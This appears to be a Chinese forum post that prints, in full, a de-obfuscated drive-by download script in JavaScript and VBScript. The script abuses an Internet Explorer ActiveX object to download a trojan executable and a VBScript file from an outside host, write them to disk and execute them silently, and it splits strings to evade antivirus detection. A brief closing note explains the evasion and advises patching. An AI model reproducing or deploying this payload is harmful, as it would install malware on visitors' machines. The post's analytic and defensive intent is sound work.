<script>var url,path;url="http://www.ysbr.cn/muma.exe";path="C:\\tcsafe.exe";try{var ado=(document.createElement("
object"));var b1="classid";var b2="clsid:";var b3="BD96C556-";var b4="65A3-11D0-983A-00C04FC29E36";ado.setAttribute(b1,b2+b3+b4);var a1="Microsoft";var a2=".XMLHTTP";var xml=ado.Create
Object(a1+a2,"");var ab="Adodb.";var cd="Stream";var as=ado.create
object(ab+cd,"");var a3="G";var a4="E";var a5="T";xml.Open(a3+a4+a5,url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);as.savetofile(path,2);as.close();var b5="Shell.";var b6="Application";var shell=ado.create
object(b5+b6,"");var c1="o";var c2="p";var c3="e";var c4="n";shell.Shell(pa222th,"","",c1+c2+c3+c4,0);}catch(e){};</script><html>
<script language="VBScript">
on error resume next
tcsafe = "http://www.ysbr.cn/333/tc.vbs"
Ftccnyt="o"&"b"&"j"&"e"&"ct"
Ktccnyt="c"&"l"&"a"&"s"&"s"&"i"&"d"
t1="clsid:":t2="BD96C556-":t3="65A3-":t4="11D0-":t5="983A-":t6="00C04FC29E36"
Ttccnyt=t1&t2&t3&t4&t5&t6
Mtccnyt="M"&"i"&"cr"&"os"&"o"&"f"&"t"&"."&"X"&"M"&"L"&"HTTP"
Vtccnyt="S"&"he"&"l"&"l"&"."&"A"&"pp"&"l"&"i"&"c"&"a"&"t"&"i"&"on"
Wtccnyt="S"&"c"&"r"&"ip"&"ti"&"n"&"g"&"."&"F"&"i"&"l"&"e"&"S"&"ys"&"t"&"em"&"O"&"b"&"j"&"ec"&"t"
sub tcsafe1exe(Vtccnyt,tcsafe9)
set tcsafee = tcsafec.create
object(Vtccnyt,"")
dd ="o"&"p"&"e"&"n"
tcsafee.ShellExecute tcsafe9,BBS,BBS,dd,0
end sub
Set tcsafec = document.createElement(Ftccnyt)
tcsafec.setAttribute Ktccnyt, Ttccnyt
tcsafei=Mtccnyt
Set tcsafed = tcsafec.Create
Object(tcsafei,"")
tcsaff="A"&"d"&"o"
tcsafg="d"&"b"&"."
tcsafh="S"&"t"&"r"
tcsafi="e"&"a"&"m"
tcsafef=tcsaff&tcsafg&tcsafh&tcsafi
tcsafeg=tcsafef
set tcsafea = tcsafec.create
object(tcsafeg,"")
tcsafea.type = 1
tcsafeh="G"&"E"&"T"
tcsafed.Open tcsafeh, tcsafe, False
tcsafed.Send
tcsafe9="tc.vbs"
set tcsafeb = tcsafec.create
object(Wtccnyt,"")
set tcsafee = tcsafeb.GetSpecialFolder(2)
tcsafea.open
tcsafe8="tcsafea.BuildPath(tcsafea,tcsafe8)"
tcsafe7="gudanjimob.BuildPath(gudanjimob,tcsafe7)"
tcsafe6="tcsafec"&"."&"B"&"u"&"i"&"l"&"dP"&"a"&"t"&"h(tcsafed,tcsafe6)"
tcsafe5="tcsafed"&"."&"B"&"u"&"i"&"l"&"d"&"P"&"at"&"h(tcsafef,tcsafe5)"
tcsafe4="tcsafee"&"."&"Bu"&"i"&"l"&"d"&"P"&"a"&"t"&"h(tcsafeg,tcsafe4)"
tcsafe3="tcsafef"&"."&"B"&"u"&"i"&"l"&"d"&"Pa"&"t"&"h(tcsafeh,tcsafe4)"
tcsafe2="tcsafeg"&"."&"B"&"u"&"il"&"d"&"P"&"a"&"t"&"h(tcsafei,tcsafe3)"
tcsafe1="tcsafeh"&"."&"B"&"u"&"i"&"l"&"d"&"P"&"a"&"t"&"h(tcsafeg,tcsafe1)"
tcsafe0="tcsafei"&"."&"B"&"u"&"i"&"l"&"d"&"P"&"at"&"h(tcsafek,tcsafe0)"
tcsafe9= tcsafeb.BuildPath(tcsafee,tcsafe9)
tcsafea.write tcsafed.responseBody
tcsafea.savetofile tcsafe9,2
tcsafea.close
call tcsafe1exe(Vtccnyt,tcsafe9)
</script>
没事干,就把他还原了一下,还是为了躲瑞星做的一个措施!
预防:打齐补丁
解决的办法还得扫LOG上来!!